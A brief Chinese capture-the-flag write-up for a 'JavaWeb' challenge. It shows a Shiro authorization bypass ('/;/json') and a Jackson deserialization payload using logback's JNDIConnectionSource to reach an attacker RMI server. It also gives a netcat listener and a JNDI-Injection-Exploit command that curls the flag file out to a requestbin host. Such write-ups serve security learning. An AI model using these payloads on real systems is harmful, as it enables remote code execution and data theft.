JavaWeb
提供两条路由分别是/login和/json
其中/login可以用
rememberMe
检测到存在Shiro反序列化,/json需要有权限访问,通过Shiro框架的/;/json
绕过,通过POST空对象[]
判断存在jackson。利用反序列化发起请求
["ch.qos.logback.core.db.JNDIConnectionSource", {"jndiLocation": "rmi://xxx:1099/aaaaaa"}]
远程监听收到报文
nc -lvnp 1099
使用JNDI注入工具:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl http://http.requestbin.buuoj.cn/1d8sev11 -F [email protected]/flag'
提交请求
["ch.qos.logback.core.db.JNDIConnectionSource", {"jndiLocation": "rmi://xxx:1099/qmblyn"}]
拿到flag

Last modified 7mo ago